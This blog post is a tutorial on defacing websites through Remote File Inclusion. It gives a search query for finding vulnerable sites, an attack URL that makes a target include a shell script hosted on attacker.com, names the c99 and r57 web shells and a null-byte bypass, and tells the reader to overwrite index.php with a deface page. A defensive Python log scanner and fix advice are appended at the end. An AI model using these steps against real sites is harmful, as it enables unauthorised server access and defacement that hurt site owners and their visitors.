Thursday, June 1, 2023

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload malicious code or a malicious file to a website or server. The vulnerability exploits inadequate validation checks in a website and can lead to code execution on the server or on the website. This time, I will be writing a simple tutorial on Remote File Inclusion, and by the end of the tutorial I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability; not all website hacking is about SQL injection. Using RFI you can deface websites, get access to the server and do almost anything with the server. What makes it a red alert for websites is that you only need common sense and a basic knowledge of PHP to execute malicious code. Bash might come in handy, as most servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find an RFI-vulnerable website. Let's see how we can find one.
As we know, finding a vulnerability is the first step in hacking a website or server. So, let's get started: simply go to Google and search for the following query.
inurl: "index.php?page=home"
In place of home, you can also try other pages such as products, gallery, etc.
If you already know an RFI-vulnerable website, then you don't need to find one through Google.
Once we have found it, let's move on to the next step. Let's say we have the following RFI-vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use the PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have put the URL of my malicious code .txt file in place of home. You can use any shell as the malicious script, such as c99, r57 or any other.
Now, if it's a really vulnerable website, there are 3 things that can happen.
  1. You might have noticed that the URL containing "page=home" had no extension, whereas I included an extension in my URL. The site may therefore give an error like 'failure to include maliciousScript.txt', because it may be automatically adding the .txt extension to the pages stored on the server.
  2. In case it automatically appends something along the lines of .php, then we have to use a null byte in order to avoid the error.
  3. Successful execution.
Once the code executes successfully, we're good to go with the shell. Now we'll browse the shell for index.php and replace the file with our deface page.
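A defender's view of the requests described above, as an added example that is not part of the original post: a Python scan of web-server access logs for query parameters that carry a remote URL or a null byte. The log lines, the attacker.example host and all function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Stream wrappers a PHP include may resolve if the parameter reaches it unchecked.
SCHEME_RE = re.compile(r"^\s*(https?|ftps?|php|data|expect|phar|zip)\s*:", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # request target

# Constructed sample lines; addresses and host names are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jun/2023:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jun/2023:10:00:05 +0000] "GET /index.php?page=http://attacker.example/maliciousScript.txt HTTP/1.1" 200 40',
    '203.0.113.9 - - [01/Jun/2023:10:00:09 +0000] "GET /index.php?page=http%3A%2F%2Fattacker.example%2FmaliciousScript.txt%00 HTTP/1.1" 200 40',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so repeatedly encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_param(value):
    """Return the RFI indicators present in one query-parameter value."""
    v = fully_decode(value)
    found = []
    if SCHEME_RE.match(v) or v.startswith("//"):
        found.append("remote-url")
    if "\x00" in v:
        found.append("null-byte")
    return found

def scan_line(line, params=None):
    """Return (client_ip, parameter, indicators); params=None checks every parameter."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    ip = line.split(" ", 1)[0]
    hits = []
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        found = classify_param(value)
        if found and (params is None or name in params):
            hits.append((ip, name, found))
    return hits

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_line(entry, params={"page"}))
```

Detection complements the fix rather than replacing it: map the page parameter to a fixed allowlist of local files and keep PHP's allow_url_include setting disabled.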